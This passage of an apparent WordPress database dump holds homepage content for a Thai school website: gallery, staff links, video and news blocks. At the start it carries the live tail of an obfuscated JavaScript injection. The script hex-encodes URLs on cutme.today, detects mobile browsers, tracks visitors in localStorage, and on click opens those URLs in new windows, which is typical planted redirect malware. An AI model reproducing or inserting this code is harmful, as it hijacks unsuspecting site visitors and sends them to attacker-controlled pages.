\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-29 18:55:24','2024-07-29 11:55:24','',19,'http://watprato.ssk.in.th/?p=131',0,'revision','',0),
(132,1,'2024-07-29 18:55:32','2024-07-29 11:55:32','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 